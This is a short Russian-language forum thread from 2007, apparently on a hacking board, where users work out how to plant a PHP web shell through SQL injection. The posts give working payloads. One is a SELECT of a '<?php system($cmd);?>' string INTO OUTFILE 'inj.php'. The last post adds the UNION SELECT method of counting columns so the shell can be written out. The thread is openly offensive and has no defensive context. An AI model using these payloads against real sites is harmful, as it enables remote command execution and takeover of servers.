Вопрос по SQL-инъекции
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя  |
| Сообщение |
<< Старые топики Новые топики >> |
|
|
Вопрос по SQL-инъекции - 2007-03-11 19:15:51.510000
|
|
|
tkvit
Сообщений: 50
Оценки: 0
Присоединился: 2007-01-07 17:48:20.876666
|
Допустим есть возможность провести sql-inj,допустим мы хотим провести инъекцию добавив следующий запрос SELECT '<?php system("$cmd");?>' INTO OUTFILE inj.php, к основному запросу,сделать это можно разделив два запроса (;) но в случае использования php функция mysql_query();обработает только первый запрос, несмотря на то что сервер бд может обработать сразу все. Как быть в таком случае
|
|
|
|
|
RE: Вопрос по SQL-инъекции - 2007-03-12 20:30:20.806666
|
|
|
ZneP
Сообщений: 910
Оценки: 0
Присоединился: 2006-08-21 16:11:47
|
перед SELECT '<?php….. добавить UNION
|
|
|
|
|
RE: Вопрос по SQL-инъекции - 2007-03-13 20:29:48.150000
|
|
|
tkvit
Сообщений: 50
Оценки: 0
Присоединился: 2007-01-07 17:48:20.876666
|
Интересно а ты сам так прбовал сделать,такой вариант не пройдет, потому-что для этого SELECT не получится вставить дополнительные поля, а для того чтобы сработал UNIION надо чтобы в обоих SELECTA-х было одинаковое количество полей, да и ваще эта конструкция с UNION выдает ошибку.
|
|
|
|
|
RE: Вопрос по SQL-инъекции - 2007-04-19 12:21:13.860000
|
|
|
mr.crown
Сообщений: 37
Оценки: 0
Присоединился: 2007-03-02 15:28:48.440000
|
quote:
Интересно а ты сам так прбовал сделать,такой вариант не пройдет, потому-что для этого SELECT не получится вставить дополнительные поля, а для того чтобы сработал UNIION надо чтобы в обоих SELECTA-х было одинаковое количество полей, да и ваще эта конструкция с UNION выдает ошибку.
Рас ошибку рисует то это гуд! Сделай перечисления типа: -1+UNION+SELECT+1,2,3…/*
Пока ошибки не станет следовательно столько столбцов в оригинальном запросе! А потом измени любое из полей на: '<?php system($cmd);?>' то есть допустим если там три поля
1+UNION+SELECT+1,'<?php system($cmd);?>',3+INTO+OUTFILE+'inj.php'/*
|
|
|
|
|
|
